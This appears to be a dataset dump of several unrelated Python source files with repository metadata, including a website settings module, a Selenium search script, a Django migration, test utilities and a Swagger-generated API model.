"""Snippet for sign_blob"""
# Create a client
client = credentials_v1.IAMCredentialsClient()
# Initialize request argument(s)
request = credentials_v1.SignBlobRequest(
name="projects/{project}/serviceAccounts/{service_account}",
payload=b'payload_blob',
)
# Make the request
response = client.sign_blob(request=request)
# Handle response
print(response)
# [END iamcredentials_generated_credentials_v1_IAMCredentials_SignBlob_sync]
|
[
"[email protected]"
] | |
b3cdcb8ef497d5e18564d7b7f47262c537e111e3
|
b89ec2839b4a6bd4e2d774f64be9138f4b71a97e
|
/dataent/website/doctype/website_settings/website_settings.py
|
4fc4412d550622749995427444bce0dbc835241c
|
[
"MIT"
] |
permissive
|
dataent/dataent
|
ec0e9a21d864bc0f7413ea39670584109c971855
|
c41bd5942ffe5513f4d921c4c0595c84bbc422b4
|
refs/heads/master
| 2022-12-14T08:33:48.008587 | 2019-07-09T18:49:21 | 2019-07-09T18:49:21 | 195,729,981 | 0 | 0 |
MIT
| 2022-12-09T17:23:49 | 2019-07-08T03:26:28 |
Python
|
UTF-8
|
Python
| false | false | 4,869 |
py
|
# Copyright (c) 2015, Dataent Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import dataent
from dataent import _
from dataent.utils import get_request_site_address, encode
from dataent.model.document import Document
from six.moves.urllib.parse import quote
from dataent.website.router import resolve_route
from dataent.website.doctype.website_theme.website_theme import add_website_theme
class WebsiteSettings(Document):
def validate(self):
self.validate_top_bar_items()
self.validate_footer_items()
self.validate_home_page()
def validate_home_page(self):
if dataent.flags.in_install:
return
if self.home_page and not resolve_route(self.home_page):
dataent.msgprint(_("Invalid Home Page") + " (Standard pages - index, login, products, blog, about, contact)")
self.home_page = ''
def validate_top_bar_items(self):
"""validate url in top bar items"""
for top_bar_item in self.get("top_bar_items"):
if top_bar_item.parent_label:
parent_label_item = self.get("top_bar_items", {"label": top_bar_item.parent_label})
if not parent_label_item:
# invalid item
dataent.throw(_("{0} does not exist in row {1}").format(top_bar_item.parent_label, top_bar_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
dataent.throw(_("{0} in row {1} cannot have both URL and child items").format(top_bar_item.parent_label,
top_bar_item.idx))
def validate_footer_items(self):
"""validate url in top bar items"""
for footer_item in self.get("footer_items"):
if footer_item.parent_label:
parent_label_item = self.get("footer_items", {"label": footer_item.parent_label})
if not parent_label_item:
# invalid item
dataent.throw(_("{0} does not exist in row {1}").format(footer_item.parent_label, footer_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
dataent.throw(_("{0} in row {1} cannot have both URL and child items").format(footer_item.parent_label,
footer_item.idx))
def on_update(self):
self.clear_cache()
def clear_cache(self):
# make js and css
# clear web cache (for menus!)
dataent.clear_cache(user = 'Guest')
from dataent.website.render import clear_cache
clear_cache()
# clears role based home pages
dataent.clear_cache()
def get_website_settings():
hooks = dataent.get_hooks()
context = dataent._dict({
'top_bar_items': get_items('top_bar_items'),
'footer_items': get_items('footer_items'),
"post_login": [
{"label": _("My Account"), "url": "/me"},
# {"class": "divider"},
{"label": _("Logout"), "url": "/?cmd=web_logout"}
]
})
settings = dataent.get_single("Website Settings")
for k in ["banner_html", "brand_html", "copyright", "twitter_share_via",
"facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup", "hide_footer_signup", "head_html", "title_prefix",
"navbar_search"]:
if hasattr(settings, k):
context[k] = settings.get(k)
if settings.address:
context["footer_address"] = settings.address
for k in ["facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup"]:
context[k] = int(context.get(k) or 0)
if dataent.request:
context.url = quote(str(get_request_site_address(full_address=True)), safe="/:")
context.encoded_title = quote(encode(context.title or ""), str(""))
for update_website_context in hooks.update_website_context or []:
dataent.get_attr(update_website_context)(context)
context.web_include_js = hooks.web_include_js or []
context.web_include_css = hooks.web_include_css or []
via_hooks = dataent.get_hooks("website_context")
for key in via_hooks:
context[key] = via_hooks[key]
if key not in ("top_bar_items", "footer_items", "post_login") \
and isinstance(context[key], (list, tuple)):
context[key] = context[key][-1]
add_website_theme(context)
if not context.get("favicon"):
context["favicon"] = "/assets/dataent/images/favicon.png"
if settings.favicon and settings.favicon != "attach_files:":
context["favicon"] = settings.favicon
return context
def get_items(parentfield):
all_top_items = dataent.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield= %s
order by idx asc""", parentfield, as_dict=1)
top_items = [d for d in all_top_items if not d['parent_label']]
# attach child items to top bar
for d in all_top_items:
if d['parent_label']:
for t in top_items:
if t['label']==d['parent_label']:
if not 'child_items' in t:
t['child_items'] = []
t['child_items'].append(d)
break
return top_items
@dataent.whitelist(allow_guest=True)
def is_chat_enabled():
return bool(dataent.db.get_single_value('Website Settings', 'chat_enable'))
|
[
"[email protected]"
] | |
b1561a5a09375df8219b095e33b192ffafb03de1
|
eb755b42aa2ec9e6ab63001a6293d5e225837086
|
/Other_web_spider/Phantomjs/Phantomjs_id_location.py
|
f4b494cfe8dbfb44c591643255e8da05cbfcbc6d
|
[] |
no_license
|
paramedick/python-web-crawlers
|
7c493cbc51c4189d0dabaeae6cfba84123f7401d
|
5deea2073583bbb8d229c6404680e543ebcdbc5b
|
refs/heads/master
| 2022-01-19T21:25:29.058709 | 2019-08-13T14:43:22 | 2019-08-13T14:43:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 209 |
py
|
# coding=utf-8
from selenium import webdriver
browser = webdriver.Firefox()
browser.get("http://www.baidu.com/")
browser.find_element_by_id("kw").send_keys("python")
browser.implicitly_wait(60)
browser.quit()
|
[
"[email protected]"
] | |
38e66487b8f3e6080d36fa5c19b8a95bc793311f
|
0e9f73d2ef1239b22e049ef6338362da7dbfb122
|
/source/web/Django/FatQuantsDjango/FatQuantsDjango/ticker/migrations/0065_auto_20190209_2232.py
|
da99dbc20030cad9a96f28f1f13228b4442183bd
|
[] |
no_license
|
Andy-Mason/FatQuants
|
3c4bfafc29834af76b0be40e93b0e210e0ef5056
|
edd0e98f4599ef91adbdf4179164769ddd66c62a
|
refs/heads/master
| 2023-01-11T10:57:50.563742 | 2021-08-11T19:04:59 | 2021-08-11T19:04:59 | 73,127,295 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 661 |
py
|
# Generated by Django 2.1.3 on 2019-02-09 22:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ticker', '0064_auto_20190209_2231'),
]
operations = [
migrations.AddField(
model_name='tickereoddata',
name='close_value',
field=models.FloatField(blank=True, db_column='close_value', null=True, verbose_name='Close'),
),
migrations.AddField(
model_name='tickereoddata',
name='volume',
field=models.FloatField(blank=True, db_column='volume', null=True, verbose_name='Volume'),
),
]
|
[
"[email protected]"
] | |
9b065ad3bc64f06b7fcaff92d27fb2ee90ecfe6e
|
fc58366ed416de97380df7040453c9990deb7faa
|
/tools/dockerize/webportal/usr/lib/python2.7/site-packages/oslo_db/tests/old_import_api/utils.py
|
44eb1aeb24eb802ae554e3fcfda13866332912a7
|
[
"Apache-2.0"
] |
permissive
|
foruy/openflow-multiopenstack
|
eb51e37b2892074234ebdd5b501b24aa1f72fb86
|
74140b041ac25ed83898ff3998e8dcbed35572bb
|
refs/heads/master
| 2016-09-13T08:24:09.713883 | 2016-05-19T01:16:58 | 2016-05-19T01:16:58 | 58,977,485 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,310 |
py
|
# Copyright 2010-2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
from oslo.config import cfg
from oslotest import base as test_base
from oslotest import moxstubout
import six
if six.PY3:
@contextlib.contextmanager
def nested(*contexts):
with contextlib.ExitStack() as stack:
yield [stack.enter_context(c) for c in contexts]
else:
nested = contextlib.nested
class BaseTestCase(test_base.BaseTestCase):
def setUp(self, conf=cfg.CONF):
super(BaseTestCase, self).setUp()
moxfixture = self.useFixture(moxstubout.MoxStubout())
self.mox = moxfixture.mox
self.stubs = moxfixture.stubs
self.conf = conf
self.addCleanup(self.conf.reset)
|
[
"[email protected]"
] | |
f44c79dba52af15a4c324b94646a2e32d5a6143e
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-gsn-edf/gsn-edf_ut=2.5_rd=0.65_rw=0.04_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=90/sched.py
|
73271d93d6d30c676753279395b2f3b6ba2f57c3
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 259 |
py
|
-X FMLP -Q 0 -L 3 93 400
-X FMLP -Q 0 -L 3 80 400
-X FMLP -Q 1 -L 2 79 250
-X FMLP -Q 1 -L 2 57 175
-X FMLP -Q 2 -L 1 54 200
-X FMLP -Q 2 -L 1 39 400
-X FMLP -Q 3 -L 1 37 125
-X FMLP -Q 3 -L 1 33 200
29 150
18 150
16 150
11 125
11 125
|
[
"[email protected]"
] | |
503cdbd13ac9e95d89d2847aabb527de1c810769
|
369b7f114f9bd9b45dd5fef77a070cb73abb68d1
|
/handle/itl/h20180123/insertFundInvestLog.py
|
0754801c39b9a7088aaa3f77d47ee88123974bf7
|
[] |
no_license
|
lyjloveabc/thor_handle
|
d790ee25317f724825c94a6b346a034ec0ae6e3d
|
8b9eda97ec873f3bf1732a428898a04d6a55c0af
|
refs/heads/master
| 2021-12-27T10:15:16.668264 | 2021-08-16T13:45:34 | 2021-08-16T13:45:34 | 84,824,162 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 571 |
py
|
import json
import requests
class InsertFundInvestLog:
def __init__(self):
# self.ENV = 'http://127.0.0.1:7001'
self.ENV = 'http://127.0.0.1:7001'
self.ENV_PROD = 'http://121.43.166.200:7001'
def handle(self):
with open('fundInvestLog_20180301.json', 'r') as f:
data = json.load(f)
for row in data:
response = requests.post(self.ENV_PROD + '/fundInvestLog/fundInvestLog', data=row)
print(response.text)
if __name__ == '__main__':
ifil = InsertFundInvestLog()
ifil.handle()
|
[
"[email protected]"
] | |
38986d4a704fb788926d73c8dcd2ed3bad07d847
|
45de3aa97525713e3a452c18dcabe61ac9cf0877
|
/src/primaires/objet/types/indefini.py
|
72fd243688f6d99b9e1d5c92bccd62e605901e8d
|
[
"BSD-3-Clause"
] |
permissive
|
stormi/tsunami
|
95a6da188eadea3620c70f7028f32806ee2ec0d1
|
bdc853229834b52b2ee8ed54a3161a1a3133d926
|
refs/heads/master
| 2020-12-26T04:27:13.578652 | 2015-11-17T21:32:38 | 2015-11-17T21:32:38 | 25,606,146 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,744 |
py
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le type Indefini."""
from .base import BaseType
class Indefini(BaseType):
"""Type d'objet: indéfini.
"""
nom_type = "indéfini"
|
[
"[email protected]"
] | |
e20e7f340b0e719fa019c02d2a227a6589f4cc4f
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_baccalaureates.py
|
b6b3d264696b8bd5b102cbd3f2ddde23ad54b79c
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 287 |
py
|
from xai.brain.wordbase.nouns._baccalaureate import _BACCALAUREATE
#calss header
class _BACCALAUREATES(_BACCALAUREATE, ):
def __init__(self,):
_BACCALAUREATE.__init__(self)
self.name = "BACCALAUREATES"
self.specie = 'nouns'
self.basic = "baccalaureate"
self.jsondata = {}
|
[
"[email protected]"
] | |
e73cfc2cdec009c867b3c766a6a035d38f33dfd6
|
b3ab2979dd8638b244abdb2dcf8da26d45d7b730
|
/cloudcheckr_cmx_client/models/azure_csp_authorization_request_model.py
|
e76c907e4fd2a4a72db3231108f61a129ace91ae
|
[] |
no_license
|
CU-CommunityApps/ct-cloudcheckr-cmx-client
|
4b3d9b82c5dfdaf24f8f443526868e971d8d1b15
|
18ac9fd4d6c4ae799c0d21745eaecd783da68c0c
|
refs/heads/main
| 2023-03-03T19:53:57.685925 | 2021-02-09T13:05:07 | 2021-02-09T13:05:07 | 329,308,757 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,134 |
py
|
# coding: utf-8
"""
CloudCheckr API
CloudCheckr API # noqa: E501
OpenAPI spec version: v1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AzureCspAuthorizationRequestModel(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'purchase_model': 'str',
'region_group': 'str'
}
attribute_map = {
'purchase_model': 'purchaseModel',
'region_group': 'regionGroup'
}
def __init__(self, purchase_model=None, region_group=None): # noqa: E501
"""AzureCspAuthorizationRequestModel - a model defined in Swagger""" # noqa: E501
self._purchase_model = None
self._region_group = None
self.discriminator = None
if purchase_model is not None:
self.purchase_model = purchase_model
if region_group is not None:
self.region_group = region_group
@property
def purchase_model(self):
"""Gets the purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
The account's purchase model. # noqa: E501
:return: The purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
:rtype: str
"""
return self._purchase_model
@purchase_model.setter
def purchase_model(self, purchase_model):
"""Sets the purchase_model of this AzureCspAuthorizationRequestModel.
The account's purchase model. # noqa: E501
:param purchase_model: The purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
:type: str
"""
allowed_values = ["AzurePlan", "Classic"] # noqa: E501
if purchase_model not in allowed_values:
raise ValueError(
"Invalid value for `purchase_model` ({0}), must be one of {1}" # noqa: E501
.format(purchase_model, allowed_values)
)
self._purchase_model = purchase_model
@property
def region_group(self):
"""Gets the region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
The account's region group (i.e. the unique data center group that is being used, e.g. commercial, gov, etc). # noqa: E501
:return: The region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
:rtype: str
"""
return self._region_group
@region_group.setter
def region_group(self, region_group):
"""Sets the region_group of this AzureCspAuthorizationRequestModel.
The account's region group (i.e. the unique data center group that is being used, e.g. commercial, gov, etc). # noqa: E501
:param region_group: The region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
:type: str
"""
allowed_values = ["Commercial", "UsGov", "Germany"] # noqa: E501
if region_group not in allowed_values:
raise ValueError(
"Invalid value for `region_group` ({0}), must be one of {1}" # noqa: E501
.format(region_group, allowed_values)
)
self._region_group = region_group
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AzureCspAuthorizationRequestModel, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AzureCspAuthorizationRequestModel):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.